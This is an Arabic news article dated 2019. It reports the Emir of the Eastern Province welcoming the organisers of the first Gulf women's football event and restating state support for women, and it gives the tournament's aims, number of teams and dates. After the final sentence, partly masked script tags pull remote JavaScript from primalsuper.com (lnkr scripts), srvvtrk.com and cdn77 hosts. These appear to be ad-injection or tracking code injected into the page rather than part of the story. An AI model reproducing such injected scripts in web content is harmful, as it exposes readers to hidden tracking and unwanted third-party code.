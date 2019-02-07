شكرا لقرائتكم خبر عن أمير الشرقية يؤكد دعم الدولة للمرأة وتمكينها وحفظ حقوقها واختياراتها والان نبدء بالتفاصيل

استقبل صاحب السمو الملكي الأمير سعود بن نايف بن عبدالعزيز أمير المنطقة الشرقية في مكتب سموه بديوان الإمارة أمس، أعضاء ومسؤولي اللجنة العليا للفعالية النسائية الكروية الأولى بالمملكة «الكرة تجمعنا» من بينهم المستشار الأعلى للتنظيم الرياضي للفعالية، رئيس لجنة رياضة المرأة في اتحاد اللجان الأولمبية الوطنية العربية الشيخة حياة بنت عبدالعزيز آل خليفة، ورئيس اللجنة التنظيمية لرياضة المرأة بمجلس التعاون لدول الخليج، ورئيس الفعالية الشيخة نعيمة الأحمد الصباح، ومدير الفعالية سناء العتيق.

وأكد سموه على دور المرأة الريادي في بناء المجتمع ومساهمتها الفاعلة، ودعم الدولة -أيّدها الله- للمرأة وتمكينها وحفظ حقوقها واحترام اختياراتها بما يحفظ لها خصوصيتها.

ورحب سموه بالفعالية الكروية النسائية الأولى من نوعها في المملكة العربية السعودية ودول الخليج «الكرة تجمعنا»، كما رحب بالضيوف من خارج المملكة، مستعرضاً روابط الأخوة والعلاقات الممتدة بين دول الخليج، واطلع على عرض مرئي لملف الفعالية.

ومن جهتها أكدت مدير البطولة سناء العتيق، أن ترحيب سمو أمير المنطقة للفعالية يأتي امتداداً لدعم كل ما من شأنه تمكين المرأة السعودية في كافة المجالات، وإيماناً من سموه بأهمية الحدث والذي يعد باكورة لانطلاق الفعاليات الرياضية النسائية بالمملكة، وتكون المنطقة الشرقية قد سبقت في ذلك، وذكرت أن رسالة البطولة هي توظيف الطاقات الكروية النسائية السعودية الشابة والموهوبة لتكون قدوة ثقافية رياضية للمجتمع السعودي النسائي،

وأشارت إلى أن أهداف البطولة تتضمن تنفيذ دوري نسائي يوظف مواهب الفتيات السعوديات، ويؤهلهن للمنافسة على أعلى مستوى دولي وتنظيم منافسة كروية نسائية سعودية تمثل الوطن أفضل تمثيل، كذلك نشر ثقافة الرياضة النسائية وتقبلها وتوسيع مفهومها لتشمل العنصر النسائي وبما يحفظ خصوصيته، كذلك تهيئة المجتمع ليتقبل فكرة فعاليات أولمبية نسائية رياضية، أيضاً تحفيز الوسط النسائي لممارسة الرياضات بأنواعها في أجواء تحفظ لهم خصوصيتهم.

يذكر أن الفاعلية يشارك فيها عدد من الفرق الرياضية النسائية الكروية من دول الخليج بلغت حوالي 8 فرق، بالإضافة إلى الألعاب المصاحبة للفعالية والتي سيشارك فيها قرابة الـ 200 لاعبة من جميع الدول وفي جميع الرياضات، وستنطلق في الأول من شهر مارس القادم وتستمر 6 أيام في الصالة الخضراء بالخبر. ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_581305611&key=1fd3b038f796d0b159&cv=1549460757&t=1549460757104" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_47140783&key=1fd3b038f796d0b159&cv=10352&t=1549460757105" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549460757108" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********